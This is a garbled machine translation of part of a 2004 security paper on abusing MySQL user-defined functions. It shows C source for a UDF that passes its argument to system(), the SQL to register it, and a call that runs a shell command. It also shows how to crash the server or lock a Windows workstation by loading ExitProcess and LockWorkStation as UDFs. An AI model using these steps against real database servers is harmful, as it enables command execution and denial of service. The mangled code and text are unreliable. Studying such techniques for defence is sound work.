Use of MYSQL user-defined functions (udfs) in Linux

In Linux, the use of MYSQL user-defined functions (UDF) Chris Anley [chris@ngssoftware.com] 5th July 2004 according to the scalability mechanism of MySQL function family, this means that you can CREATE a dynamic library containing user-defined functions to CREATE user-defined functions. for short, udfs use the create function statement to implement this mechanism. func' table input information to load them. when MYSQL loads these dynamic libraries, the file path of the dynamic library must be accessible by MYSQL. attackers will abuse this mechanism to create malicious dynamic library files with ulterior motives and use them to SELECT... The into outfile statement is written to an available Directory. After these files are created successfully, an attacker enters information INTO the mysql. func table through insert to configure MYSQL to load these dynamic library files and execute these functions. The following is a fairly simple code of the UDF link library (forgive him for being very simple) (foreigners are very polite !): # Include <stdio. h> # include <stdlib. h>/* compile with something likegcc-g-c example-g-shared-W1,-soname, so_system.so.0-o so_system.so.0.0 so_system.o-lc */enum Item_result {STRING_RESULT, REAL_RESULT, INT_RESULT, ROW_RESULT}; typedef struct st_udf_args {unsigned int arg_count;/* Number of arguments */enum Item_result * arg_type;/* Pointer to item_results */char ** args; /* Pointer Argument */unsigned long * lengths;/* Length of string arguments */char * maybe_null;/* Set to 1 for all maybe_null args */Page 18} UDF_ARGS; typedef struct st_udf_init {char maybe_null;/* 1 if function can return NULL */unsigned int decimals;/* for real functions */unsigned long max_length; /* For string functions */char * ptr;/* free pointer for function data */char const_item;/* 0 if result I S independent of arguments */} UDF_INIT; int do_system (UDF_INIT * initid, UDF_ARGS * args, char * is_null, char * error) {if (args-> arg_count! = 1) return 0; system (args-> args [0]); return 0;} Add a function like this: mysql> create function do_system returns integer soname' so _ system. so '; Query OK, 0 rows affected (0.00 sec) now table mysql. func is similar to this. Of course, you can use update to modify it. Mysql> select * from mysql. func; + ---- + -- + ----- + ---- + | name | ret | dl | type | + ---- + -- + ----- + ---- + | do_system | 2 | so_system.so | function | + ---- + -- + ----- + ---- + 1 row in set (0.00 sec) call the function: mysql> select do_system ('ls>/tmp/test.txt '); + ----------- + | do_system ('ls>/tmp/test.txt ') | + ----------- + |-4665733612002344960 | + ----------- + 1 row in set (0.02 sec) even if the file permission does not allow us to create our own dynamic library file on the target system, we may still use existing functions Achieve some evil intentions. The difficulty for attackers is that the function parameter list does not match the MySQL UDF function prototype: int xxx (UDF_INIT * initid, UDF_ARGS * args, char * is_null, char * error )...... Despite the fact that sophisticated attackers may be able to design vulnerabilities that can be controlled in the dynamic library of the calling system to execute arbitrary code, it is still difficult. Page 19 when MySQL parses and executes the passed parameters, it is still possible to perform "bad" tasks through functions in the existing dynamic library. For example, you can call the function ExitProcess as a mysql udf in windows, which immediately causes the exit, even if you do not have the shutdown permission in mysql. Mysql> create function ExitProcess returns integer soname 'kernel32'; Query OK, 0 rows affected (0.17 sec) mysql> select exitprocess (); ERROR 2013: lost connection to MySQL server during query You can also talk about the logon session lock of the current workstation (equivalent to ctrl + del alt): mysql> create function LockWorkStation returns integer soname 'user32'; Query OK, 0 rows affected (0.00 sec) mysql> select LockWorkStation ();